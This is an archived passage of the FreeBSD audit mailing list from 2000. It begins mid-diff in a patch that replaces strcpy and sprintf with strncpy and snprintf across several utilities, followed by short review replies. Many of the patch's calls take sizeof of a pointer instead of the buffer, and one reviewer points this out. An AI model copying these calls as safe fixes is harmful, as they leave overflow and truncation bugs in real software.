va_start (args, fmt); vfprintf (debugf, fmt, args); - vsprintf (buf, fmt, args); + vsnprintf (buf, sizeof(buf), fmt, args); va_end (args); tty_move(23, 0); Index: doscmd/doscmd.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/doscmd.c,v retrieving revision 1.14 diff -u -r1.14 doscmd.c --- doscmd/doscmd.c 2000/06/23 08:57:17 1.14 +++ doscmd/doscmd.c 2000/12/05 01:00:48 @@ -707,7 +707,7 @@ fd = open_name(fullname, ext); - strcpy(cmdname, name); + strncpy(cmdname, name, sizeof(cmdname)); if (*ext) strcat(cmdname, ext); return (fd); Index: doscmd/exe.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/exe.c,v retrieving revision 1.2 diff -u -r1.2 exe.c --- doscmd/exe.c 1999/08/28 01:00:15 1.2 +++ doscmd/exe.c 2000/12/05 01:00:48 @@ -84,13 +84,13 @@ if (total + len >= 32 * 1024) break; total += len + 1; - strcpy (p, env[i]); + strncpy (p, env[i], sizeof(p)); p += strlen (p) + 1; } *p++ = 0; *(short *)p = strlen(cmdname); p += 2; - strcpy (p, cmdname); + strncpy (p, cmdname, sizeof(p)); while(*p) { if (*p == '/') *p = '\\'; Index: doscmd/i386-pinsn.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/i386-pinsn.c,v retrieving revision 1.1 diff -u -r1.1 i386-pinsn.c --- doscmd/i386-pinsn.c 1997/08/09 01:42:43 1.1 +++ doscmd/i386-pinsn.c 2000/12/05 01:00:48 @@ -957,7 +957,7 @@ { /* fwait not followed by floating point instruction */ oappend ("fwait"); - strcpy (outbuf, obuf); + strncpy (outbuf, obuf, sizeof(outbuf)); return (1); } @@ -1053,7 +1053,7 @@ oappend (","); oappend (third); } - strcpy (outbuf, obuf); + strncpy (outbuf, obuf, sizeof(outbuf)); return (codep - inbuf); } @@ -1332,7 +1332,7 @@ /* ARGSUSED */ OP_STi (ignore) { - sprintf (scratchbuf, "%%st(%d)", rm); + snprintf (scratchbuf, sizeof(scratchbuf), "%%st(%d)", rm); oappend (scratchbuf); } @@ -1373,7 +1373,7 @@ oappend (s) char *s; { - strcpy (obufp, s); + strncpy (obufp, s, sizeof(obufp)); obufp += strlen (s); *obufp = 0; } @@ -1499,7 +1499,7 @@ if (mod != 0 || (aflag && rm == 5 || (havesib && base == 5)) || (!aflag && rm == 6)) { - sprintf (scratchbuf, "0x%x", disp); + snprintf (scratchbuf, sizeof(scratchbuf), "0x%x", disp); oappend (scratchbuf); } @@ -1509,10 +1509,10 @@ oappend (aflag ? names32[base] : names16_pairs[base]); if (havesib) { if (index != 4) { - sprintf (scratchbuf, ",%s", names32[index]); + snprintf (scratchbuf, sizeof(scratchbuf), ",%s", names32[index]); oappend (scratchbuf); } - sprintf (scratchbuf, ",%d", 1 << scale); + snprintf (scratchbuf, sizeof(scratchbuf), ",%d", 1 << scale); oappend (scratchbuf); } oappend (")"); @@ -1619,7 +1619,7 @@ oappend (""); return; } - sprintf (scratchbuf, "$0x%x", op); + snprintf (scratchbuf, sizeof(scratchbuf), "$0x%x", op); oappend (scratchbuf); } @@ -1645,7 +1645,7 @@ oappend (""); return; } - sprintf (scratchbuf, "$0x%x", op); + snprintf (scratchbuf, sizeof(scratchbuf), "$0x%x", op); oappend (scratchbuf); } @@ -1679,7 +1679,7 @@ append_pc(unsigned long pc) { - sprintf(scratchbuf, "%04x:%04x", pc >> 16, pc & 0xffff); + snprintf(scratchbuf, sizeof(scratchbuf), "%04x:%04x", pc >> 16, pc & 0xffff); } /* ARGSUSED */ @@ -1709,7 +1709,7 @@ offset = get16 (); seg = get16 (); } - sprintf (scratchbuf, "%04x:%04x", seg, offset); + snprintf (scratchbuf, sizeof(scratchbuf), "%04x:%04x", seg, offset); oappend (scratchbuf); break; case v_mode: @@ -1737,7 +1737,7 @@ else off = get16 (); - sprintf (scratchbuf, "0x%x", off); + snprintf (scratchbuf, sizeof(scratchbuf), "0x%x", off); oappend (scratchbuf); } @@ -1767,7 +1767,7 @@ OP_C (dummy) { codep++; /* skip mod/rm */ - sprintf (scratchbuf, "%%cr%d", reg); + snprintf (scratchbuf, sizeof(scratchbuf), "%%cr%d", reg); oappend (scratchbuf); } @@ -1775,7 +1775,7 @@ OP_D (dummy) { codep++; /* skip mod/rm */ - sprintf (scratchbuf, "%%db%d", reg); + snprintf (scratchbuf, sizeof(scratchbuf), "%%db%d", reg); oappend (scratchbuf); } @@ -1783,7 +1783,7 @@ OP_T (dummy) { codep++; /* skip mod/rm */ - sprintf (scratchbuf, "%%tr%d", reg); + snprintf (scratchbuf, sizeof(scratchbuf), "%%tr%d", reg); oappend (scratchbuf); } Index: doscmd/int17.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/doscmd/int17.c,v retrieving revision 1.4 diff -u -r1.4 int17.c --- doscmd/int17.c 1999/08/28 01:00:17 1.4 +++ doscmd/int17.c 2000/12/05 01:00:48 @@ -138,7 +138,7 @@ return; } } else { - sprintf(printer_name, "/dev/lpt%d", printer); + snprintf(printer_name, sizeof(printer_name), "/dev/lpt%d", printer); debug(D_PRINTER, "Opening device %s\n", printer_name); if ((fd = open(printer_name, O_WRONLY)) < 0) { perror(printer_name); Index: ee/ee.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/ee/ee.c,v retrieving revision 1.19 diff -u -r1.19 ee.c --- ee/ee.c 2000/08/21 10:21:28 1.19 +++ ee/ee.c 2000/12/05 01:00:49 @@ -931,7 +931,7 @@ string = "^?"; else if (!eightbit) { - sprintf(string2, "<%d>", (character < 0) ? (character + 256) : character); + snprintf(string2, sizeof(string2), "<%d>", (character < 0) ? (character + 256) : character); string = string2; } else @@ -1585,7 +1585,7 @@ { char buffer[256]; - sprintf(buffer, ">!%s", print_command); + snprintf(buffer, sizeof(buffer), ">!%s", print_command); wmove(com_win, 0, 0); wclrtoeol(com_win); wprintw(com_win, printer_msg_str, print_command); @@ -4133,7 +4133,7 @@ if (stat(file_name, &buf) != -1) { - sprintf(buffer, "%s.old", file_name); + snprintf(buffer, sizeof(buffer), "%s.old", file_name); unlink(buffer); link(file_name, buffer); unlink(file_name); @@ -4278,10 +4278,10 @@ return; } pid = getpid(); - sprintf(name, "/tmp/ee.%d", pid); + snprintf(name, sizeof(name), "/tmp/ee.%d", pid); if (write_file(name)) { - sprintf(string, "ispell %s", name); + snprintf(string, sizeof(string), "ispell %s", name); sh_command(string); delete_text(); tmp_file = name; @@ -4590,21 +4590,29 @@ do { - sprintf(modes_menu[1].item_string, "%s %s", mode_strings[1], + snprintf(modes_menu[1].item_string, + sizeof(modes_menu[1].item_string), "%s %s", mode_strings[1], (expand_tabs ? ON : OFF)); - sprintf(modes_menu[2].item_string, "%s %s", mode_strings[2], + snprintf(modes_menu[2].item_string, + sizeof(modes_menu[2].item_string), "%s %s", mode_strings[2], (case_sen ? ON : OFF)); - sprintf(modes_menu[3].item_string, "%s %s", mode_strings[3], + snprintf(modes_menu[3].item_string, + sizeof(modes_menu[3].item_string), "%s %s", mode_strings[3], (observ_margins ? ON : OFF)); - sprintf(modes_menu[4].item_string, "%s %s", mode_strings[4], + snprintf(modes_menu[4].item_string, + sizeof(modes_menu[4].item_string), "%s %s", mode_strings[4], (auto_format ? ON : OFF)); - sprintf(modes_menu[5].item_string, "%s %s", mode_strings[5], + snprintf(modes_menu[5].item_string, + sizeof(modes_menu[5].item_string), "%s %s", mode_strings[5], (eightbit ? ON : OFF)); - sprintf(modes_menu[6].item_string, "%s %s", mode_strings[6], + snprintf(modes_menu[6].item_string, + sizeof(modes_menu[6].item_string), "%s %s", mode_strings[6], (info_window ? ON : OFF)); - sprintf(modes_menu[7].item_string, "%s %s", mode_strings[7], + snprintf(modes_menu[7].item_string, + sizeof(modes_menu[7].item_string), "%s %s", mode_strings[7], (emacs_keys_mode ? ON : OFF)); - sprintf(modes_menu[8].item_string, "%s %d", mode_strings[8], + snprintf(modes_menu[8].item_string, + sizeof(modes_menu[8].item_string), "%s %d", mode_strings[8], right_margin); ret_value = menu_op(modes_menu); @@ -4719,7 +4727,7 @@ return(name); } buffer = malloc(strlen(user->pw_dir) + strlen(slash) + 1); - strcpy(buffer, user->pw_dir); + strncpy(buffer, user->pw_dir, sizeof(buffer)); strcat(buffer, slash); } else Index: ee/new_curse.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/ee/new_curse.c,v retrieving revision 1.4 diff -u -r1.4 new_curse.c --- ee/new_curse.c 1999/09/06 07:33:51 1.4 +++ ee/new_curse.c 2000/12/05 01:00:49 @@ -794,7 +794,8 @@ { Data_Line_len = 23 + strlen(TERM_PATH) + strlen(TERMINAL_TYPE); Term_File_name = malloc(Data_Line_len); - sprintf(Term_File_name, "%s/%c/%s", TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); + snprintf(Term_File_name, sizeof(Term_File_name), "%s/%c/%s", + TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); Fildes = open(Term_File_name, O_RDONLY); } if (Fildes == -1) @@ -802,7 +803,8 @@ TERM_PATH = "/usr/lib/terminfo"; Data_Line_len = 23 + strlen(TERM_PATH) + strlen(TERMINAL_TYPE); Term_File_name = malloc(Data_Line_len); - sprintf(Term_File_name, "%s/%c/%s", TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); + snprintf(Term_File_name, sizeof(Term_File_name), "%s/%c/%s", + TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); Fildes = open(Term_File_name, O_RDONLY); } if (Fildes == -1) @@ -810,7 +812,8 @@ TERM_PATH = "/usr/share/lib/terminfo"; Data_Line_len = 23 + strlen(TERM_PATH) + strlen(TERMINAL_TYPE); Term_File_name = malloc(Data_Line_len); - sprintf(Term_File_name, "%s/%c/%s", TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); + snprintf(Term_File_name, sizeof(Term_File_name), "%s/%c/%s", + TERM_PATH, *TERMINAL_TYPE, TERMINAL_TYPE); Fildes = open(Term_File_name, O_RDONLY); } if (Fildes == -1) @@ -1095,7 +1098,7 @@ Spoint->element = (struct KEYS *) malloc(sizeof(struct KEYS)); Spoint->element->length = strlen(String_table[key_def]); Spoint->element->string = malloc(Spoint->element->length + 1); - strcpy(Spoint->element->string, String_table[key_def]); + strncpy(Spoint->element->string, String_table[key_def], sizeof(Spoint->element->string)); Spoint->element->value = Key_vals[Counter]; Klen = strlen(Spoint->element->string); if (Klen > Max_Key_len) @@ -1223,7 +1226,7 @@ char *Ftemp; Ftemp = Name = malloc(strlen(TERMINAL_TYPE + 1) + 1); - strcpy(Name, TERMINAL_TYPE); + strncpy(Name, TERMINAL_TYPE, sizeof(Name)); while (*Ftemp != (char)NULL) Ftemp++; *Ftemp++ = '|'; Index: hexdump/conv.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/hexdump/conv.c,v retrieving revision 1.1.1.1 diff -u -r1.1.1.1 conv.c --- hexdump/conv.c 1994/05/27 12:31:41 1.1.1.1 +++ hexdump/conv.c 2000/12/05 01:00:49 @@ -86,7 +86,8 @@ *pr->cchar = 'c'; (void)printf(pr->fmt, *p); } else { - (void)sprintf(str = buf, "%03o", (int)*p); + str = buf; + snprintf(str, sizeof(str), "%03o", (int)*p); strpr: *pr->cchar = 's'; (void)printf(pr->fmt, str); } Index: indent/args.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/indent/args.c,v retrieving revision 1.3 diff -u -r1.3 args.c --- indent/args.c 1999/08/28 01:02:10 1.3 +++ indent/args.c 2000/12/05 01:00:49 @@ -162,7 +162,7 @@ char fname[BUFSIZ]; static char prof[] = ".indent.pro"; - sprintf(fname, "%s/%s", getenv("HOME"), prof); + snprintf(fname, sizeof(fname), "%s/%s", getenv("HOME"), prof); if ((f = fopen(option_source = fname, "r")) != NULL) { scan_profile(f); (void) fclose(f); Index: indent/indent.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/indent/indent.c,v retrieving revision 1.6 diff -u -r1.6 indent.c --- indent/indent.c 2000/07/10 09:09:52 1.6 +++ indent/indent.c 2000/12/05 01:00:49 @@ -497,7 +497,7 @@ if (ps.in_decl && !ps.block_init) if (troff && !ps.dumped_decl_indent && !is_procname && ps.last_token == decl) { ps.dumped_decl_indent = 1; - sprintf(e_code, "\n.Du %dp+\200p \"%s\"\n", dec_ind * 7, token); + snprintf(e_code, sizeof(e_code), "\n.Du %dp+\200p \"%s\"\n", dec_ind * 7, token); e_code += strlen(e_code); } else { @@ -567,7 +567,7 @@ *e_code++ = ' '; if (troff && !ps.dumped_decl_indent && ps.in_decl && !is_procname) { - sprintf(e_code, "\n.Du %dp+\200p \"%s\"\n", dec_ind * 7, token); + snprintf(e_code, sizeof(e_code), "\n.Du %dp+\200p \"%s\"\n", dec_ind * 7, token); ps.dumped_decl_indent = 1; e_code += strlen(e_code); } @@ -909,7 +909,7 @@ if (is_procname == 0 || !procnames_start_line) { if (!ps.block_init) if (troff && !ps.dumped_decl_indent) { - sprintf(e_code, "\n.De %dp+\200p\n", dec_ind * 7); + snprintf(e_code, sizeof(e_code), "\n.De %dp+\200p\n", dec_ind * 7); ps.dumped_decl_indent = 1; e_code += strlen(e_code); } @@ -1155,7 +1155,7 @@ p--; if (*p == '/') p++; - sprintf(bakfile, "%s.BAK", p); + snprintf(bakfile, sizeof(bakfile), "%s.BAK", p); /* copy in_name to backup file */ bakchn = creat(bakfile, 0600); Index: jot/jot.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/jot/jot.c,v retrieving revision 1.14 diff -u -r1.14 jot.c --- jot/jot.c 2000/07/10 05:57:29 1.14 +++ jot/jot.c 2000/12/05 01:00:49 @@ -140,11 +140,11 @@ boring = 1; case 'w': if ((*av)[2]) - strcpy(format, *av + 2); + strncpy(format, *av + 2, sizeof(format)); else if (!--ac) errx(1, "need context word after -w or -b"); else - strcpy(format, *++av); + strncpy(format, *++av, sizeof(format)); break; case 's': if ((*av)[2]) @@ -385,9 +385,9 @@ if (*p == '%' && *(p+1) != '%') /* leave %% alone */ break; if (!*p && !chardata) - sprintf(p, "%%.%df", prec); + snprintf(p, sizeof(p), "%%.%df", prec); else if (!*p && chardata) { - strcpy(p, "%c"); + strncpy(p, "%c", sizeof(p)); intdata = 1; } else if (!*(p+1)) strcat(format, "%"); /* cannot end in single '%' */ Index: lam/lam.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/lam/lam.c,v retrieving revision 1.4 diff -u -r1.4 lam.c --- lam/lam.c 2000/07/10 09:14:15 1.4 +++ lam/lam.c 2000/12/05 01:00:49 @@ -155,7 +155,7 @@ fmtp += strlen(fmtp) + 1; if (fmtp > fmtbuf + BUFSIZ) errx(1, "no more format space"); - sprintf(fmtp, "%%%ss", p); + snprintf(fmtp, sizeof(fmtp), "%%%ss", p); ip->format = fmtp; } else @@ -181,7 +181,7 @@ while (*p) *lp++ = *p++; if (ip->pad) { - sprintf(lp, ip->format, ""); + snprintf(lp, sizeof(lp), ip->format, ""); lp += strlen(lp); } return (lp); @@ -213,7 +213,7 @@ p = ip->sepstring; while (*p) *lp++ = *p++; - sprintf(lp, ip->format, s); + snprintf(lp, sizeof(lp), ip->format, s); lp += strlen(lp); return (lp); } Index: limits/limits.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/limits/limits.c,v retrieving revision 1.8 diff -u -r1.8 limits.c --- limits/limits.c 2000/03/26 14:37:47 1.8 +++ limits/limits.c 2000/12/05 01:00:49 @@ -320,11 +320,11 @@ rlim_t val; /* current value overridden by resourcename or resourcename-cur */ - sprintf(str, "%s-cur", resources[rcswhich].cap); + snprintf(str, sizeof(str), "%s-cur", resources[rcswhich].cap); val = resources[rcswhich].func(lc, resources[rcswhich].cap, limits[rcswhich].rlim_cur, limits[rcswhich].rlim_cur); limits[rcswhich].rlim_cur = resources[rcswhich].func(lc, str, val, val); /* maximum value overridden by resourcename or resourcename-max */ - sprintf(str, "%s-max", resources[rcswhich].cap); + snprintf(str, sizeof(str), "%s-max", resources[rcswhich].cap); val = resources[rcswhich].func(lc, resources[rcswhich].cap, limits[rcswhich].rlim_max, limits[rcswhich].rlim_max); limits[rcswhich].rlim_max = resources[rcswhich].func(lc, str, val, val); } @@ -466,9 +466,9 @@ char numbr[64]; if (limit == RLIM_INFINITY) - strcpy(numbr, inf); + strncpy(numbr, inf, sizeof(numbr)); else - sprintf(numbr, "%qd", (quad_t)((limit + divisor/2) / divisor)); + snprintf(numbr, sizeof(numbr), "%qd", (quad_t)((limit + divisor/2) / divisor)); printf(pfx, which, numbr); printf(sfx, which); @@ -614,18 +614,18 @@ FILE * fp; struct stat st; char procdir[MAXPATHLEN], buf[128]; - int l = sprintf(procdir, "/proc/%ld/", (long)ppid); + int l = snprintf(procdir, sizeof(procdir), "/proc/%ld/", (long)ppid); char * shell = getenv("SHELL"); if (shell != NULL && stat(shell, &st) != -1) { struct stat st1; - strcpy(procdir+l, "file"); + strncpy(procdir+l, "file", sizeof(procdir+l)); /* $SHELL is actual shell? */ if (stat(procdir, &st1) != -1 && memcmp(&st, &st1, sizeof st) == 0) return getshellbyname(shell); } - strcpy(procdir+l, "status"); + strncpy(procdir+l, "status", sizeof(procdir+l)); if (stat(procdir, &st) == 0 && (fp = fopen(procdir, "r")) != NULL) { char * p = fgets(buf, sizeof buf, fp)==NULL ? NULL : strtok(buf, " \t"); fclose(fp); Index: mail/cmd1.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/mail/cmd1.c,v retrieving revision 1.3 diff -u -r1.3 cmd1.c --- mail/cmd1.c 1998/07/06 21:01:17 1.3 +++ mail/cmd1.c 2000/12/05 01:00:49 @@ -194,7 +194,7 @@ if (mp->m_flag & MBOX) dispc = 'M'; parse(headline, &hl, pbuf); - sprintf(wcount, "%3ld/%-5ld", mp->m_lines, mp->m_size); + snprintf(wcount, sizeof(wcount), "%3ld/%-5ld", mp->m_lines, mp->m_size); subjlen = screenwidth - 50 - strlen(wcount); name = value("show-rcpt") != NOSTR ? skin(hfield("to", mp)) : nameof(mp, 0); Index: mail/fio.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/mail/fio.c,v retrieving revision 1.3 diff -u -r1.3 fio.c --- mail/fio.c 2000/10/24 13:54:31 1.3 +++ mail/fio.c 2000/12/05 01:00:49 @@ -69,7 +69,7 @@ char linebuf[LINESIZE]; /* Get temporary file. */ - (void)sprintf(linebuf, "%s/mail.XXXXXX", tmpdir); + snprintf(linebuf, sizeof(linebuf), "%s/mail.XXXXXX", tmpdir); if ((c = mkstemp(linebuf)) == -1 || (mestmp = Fdopen(c, "r+")) == NULL) { errx(1, "can't open %s", linebuf); @@ -341,12 +341,12 @@ /* fall through */ } if (name[0] == '+' && getfold(cmdbuf) >= 0) { - sprintf(xname, "%s/%s", cmdbuf, name + 1); + snprintf(xname, sizeof(xname), "%s/%s", cmdbuf, name + 1); name = savestr(xname); } /* catch the most common shell meta character */ if (name[0] == '~' && (name[1] == '/' || name[1] == '\0')) { - sprintf(xname, "%s%s", homedir, name + 1); + snprintf(xname, sizeof(xname),"%s%s", homedir, name + 1); name = savestr(xname); } if (!anyof(name, "~{[*?$`'\"\\")) @@ -355,7 +355,7 @@ perror("pipe"); return name; } - sprintf(cmdbuf, "echo %s", name); + snprintf(cmdbuf, sizeof(cmdbuf), "echo %s", name); if ((shell = value("SHELL")) == NOSTR) shell = _PATH_CSHELL; pid = start_command(shell, 0, -1, pivec[1], "-c", cmdbuf, NOSTR); @@ -406,9 +406,9 @@ if ((folder = value("folder")) == NOSTR) return (-1); if (*folder == '/') - strcpy(name, folder); + strncpy(name, folder, sizeof(name)); else - sprintf(name, "%s/%s", homedir, folder); + snprintf(name, sizeof(name), "%s/%s", homedir, folder); return (0); } @@ -425,7 +425,7 @@ else if (*cp != '/') { char buf[PATHSIZE]; - (void) sprintf(buf, "~/%s", cp); + snprintf(buf, sizeof(buf), "~/%s", cp); cp = expand(buf); } return cp; Index: mail/lex.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/mail/lex.c,v retrieving revision 1.8 diff -u -r1.8 lex.c --- mail/lex.c 2000/11/27 07:32:29 1.8 +++ mail/lex.c 2000/12/05 01:00:49 @@ -128,9 +128,9 @@ } shudclob = 1; edit = isedit; - strcpy(prevfile, mailname); + strncpy(prevfile, mailname, sizeof(prevfile)); if (name != mailname) - strcpy(mailname, name); + strncpy(mailname, name, sizeof(mailname)); mailsize = fsize(ibuf); if ((otf = fopen(tempMesg, "w")) == NULL) { perror(tempMesg); @@ -616,7 +616,7 @@ if (getfold(fname) >= 0) { strcat(fname, "/"); if (strncmp(fname, mailname, strlen(fname)) == 0) { - sprintf(zname, "+%s", mailname + strlen(fname)); + snprintf(zname, sizeof(zname), "+%s", mailname + strlen(fname)); ename = zname; } } Index: mail/v7.local.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/mail/v7.local.c,v retrieving revision 1.2 diff -u -r1.2 v7.local.c --- mail/v7.local.c 1996/10/06 01:55:32 1.2 +++ mail/v7.local.c 2000/12/05 01:00:49 @@ -58,9 +58,9 @@ char *tmp = getenv("MAIL"); if (tmp == NULL) - (void)sprintf(buf, "%s/%s", _PATH_MAILDIR, user); + snprintf(buf, sizeof(buf), "%s/%s", _PATH_MAILDIR, user); else - (void)strcpy(buf, tmp); + strncpy(buf, tmp, sizeof(buf)); } /* --9jxsPFA5p3P2qPhR-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 17:15:55 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 17:15:54 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id 3810E37B400 for ; Mon, 4 Dec 2000 17:15:54 -0800 (PST) Received: by peitho.fxp.org (Postfix, from userid 1501) id DD7F41360E; Mon, 4 Dec 2000 20:15:57 -0500 (EST) Date: Mon, 4 Dec 2000 20:15:57 -0500 From: Chris Faulhaber To: Will Andrews Cc: audit@FreeBSD.org Subject: Re: usr.bin audit patch Message-ID: <20001204201557.A15550@peitho.fxp.org> References: <20001204201058.W570@puck.firepipe.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001204201058.W570@puck.firepipe.net>; from will@physics.purdue.edu on Mon, Dec 04, 2000 at 08:10:58PM -0500 Sender: cdf.lists@fxp.org Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Mon, Dec 04, 2000 at 08:10:58PM -0500, Will Andrews wrote: > Hi guys, > > This is a bit of auditing I did on usr.bin (about half of it anyway). > There's probably a lot of false positives here. Sorry for being a lame > auditer. Feel free to enlighten me. :-) > You might also want to look at the couple dozen patches I have at http://www.fxp.org/~jedgar/FreeBSD/diffs/pending/ -- Chris D. Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 17:21:32 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 17:21:31 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 868CA37B401 for ; Mon, 4 Dec 2000 17:21:30 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id 87FF418C5; Mon, 4 Dec 2000 20:21:29 -0500 (EST) Date: Mon, 4 Dec 2000 20:21:29 -0500 From: Will Andrews To: Chris Faulhaber Cc: Will Andrews , audit@FreeBSD.org Subject: Re: usr.bin audit patch Message-ID: <20001204202129.X570@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Chris Faulhaber , audit@FreeBSD.org References: <20001204201058.W570@puck.firepipe.net> <20001204201557.A15550@peitho.fxp.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001204201557.A15550@peitho.fxp.org>; from jedgar@fxp.org on Mon, Dec 04, 2000 at 08:15:57PM -0500 X-Operating-System: FreeBSD 4.1-STABLE i386 Sender: will@puck.firepipe.net Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG On Mon, Dec 04, 2000 at 08:15:57PM -0500, Chris Faulhaber wrote: > You might also want to look at the couple dozen patches I have at > http://www.fxp.org/~jedgar/FreeBSD/diffs/pending/ Ah, cool. You've mostly added checking on errors in calls like malloc(), str*(), and such. All I knew about was assuming infinite strings based on user data (strcpy() & sprintf()). Thanks. -- wca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 18:15:51 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 18:15:48 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from lennier.cc.vt.edu (lennier.cc.vt.edu [198.82.161.193]) by hub.freebsd.org (Postfix) with ESMTP id C30D737B402 for ; Mon, 4 Dec 2000 18:15:47 -0800 (PST) Received: from mail.vt.edu (gkar.cc.vt.edu [198.82.161.190]) by lennier.cc.vt.edu (8.11.0/8.11.0) with ESMTP id eB52FkB165151 for ; Mon, 4 Dec 2000 21:15:46 -0500 (EST) Received: from muriel.penguinpowered.com ([198.82.100.195]) by gkar.cc.vt.edu (Sun Internet Mail Server sims.3.5.2000.03.23.18.03.p10) with ESMTP id <0G52006PTOY8IB@gkar.cc.vt.edu> for FreeBSD-audit@freebsd.org; Mon, 4 Dec 2000 21:15:44 -0500 (EST) Date: Mon, 04 Dec 2000 21:15:44 -0500 (EST) From: Mike Heffner Subject: ispcvt, loadfont, scon, vt220keys -- patches Sender: spock@muriel.penguinpowered.com To: FreeBSD-audit Message-id: MIME-version: 1.0 X-Mailer: XFMail 1.4.4 on FreeBSD Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 8bit X-Priority: 3 (Normal) Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG I've patched the programs below similar to the previous cursor patch (use the err(1) functions for reporting errors). Reviews? All the following are in: http://my.ispchannel.com/~mheffner/patches/ Program Filename ispcvt ispcvt.patch loadfont loadfont.patch scon scon.patch vt220keys vt220keys.patch -- Mike Heffner Blacksburg, VA ICQ# 882073 http://my.ispchannel.com/~mheffner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 18:43:45 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 18:43:43 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id DD46D37B400 for ; Mon, 4 Dec 2000 18:43:41 -0800 (PST) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.11.1/8.11.1) with ESMTP id eB52hRR79642; Tue, 5 Dec 2000 08:43:27 +0600 (NS) (envelope-from fjoe@iclub.nsu.ru) Date: Tue, 5 Dec 2000 08:43:26 +0600 (NS) From: Max Khon To: Will Andrews Cc: audit@FreeBSD.ORG Subject: Re: usr.bin audit patch In-Reply-To: <20001204201058.W570@puck.firepipe.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-audit@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG hi, there! On Mon, 4 Dec 2000, Will Andrews wrote: > This is a bit of auditing I did on usr.bin (about half of it anyway). > There's probably a lot of false positives here. Sorry for being a lame > auditer. Feel free to enlighten me. :-) Index: apply/apply.c =================================================================== RCS file: /cvs/FreeBSD/src/usr.bin/apply/apply.c,v retrieving revision 1.10 diff -u -r1.10 apply.c --- apply/apply.c 2000/10/16 08:11:48 1.10 +++ apply/apply.c 2000/12/05 01:00:48 @@ -124,9 +124,9 @@ nargs = 1; p = cmd; - p += sprintf(cmd, "exec %s", argv[0]); + p += snprintf(cmd, sizeof(cmd), "exec %s", argv[0]); for (i = 1; i <= nargs; i++) - p += sprintf(p, " %c%d", magic, i); + p += snprintf(p, sizeof(p), " %c%d", magic, i); sizeof(p) == sizeof(void *) (== 4 on i386) -- it is not what your tried to achieve. also do not use strncpy/strncat instead of strcpy/strcat. in most cases this is useless -- use strlcpy/strlcat instead /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-audit" in the body of the message From owner-freebsd-audit Mon Dec 4 18:48:28 2000 From owner-freebsd-audit@FreeBSD.ORG Mon Dec 4 18:48:26 2000 Return-Path: Delivered-To: freebsd-audit@freebsd.org Received: from puck.firepipe.net (mcut-b-167.resnet.purdue.edu [128.211.209.167]) by hub.freebsd.org (Postfix) with ESMTP id 4EEDF37B400 for ; Mon, 4 Dec 2000 18:48:26 -0800 (PST) Received: by puck.firepipe.net (Postfix, from userid 1000) id BFF2B18C5; Mon, 4 Dec 2000 21:48:25 -0500 (EST) Date: Mon, 4 Dec 2000 21:48:25 -0500 From: Will Andrews To: Max Khon Cc: Will Andrews , audit@FreeBSD.ORG Subject: Re: usr.bin audit patch Message-ID: <20001204214825.Z570@puck.firepipe.net> Reply-To: Will Andrews Mail-Followup-To: Will Andrews , Max Khon , audit@FreeBSD.ORG References: 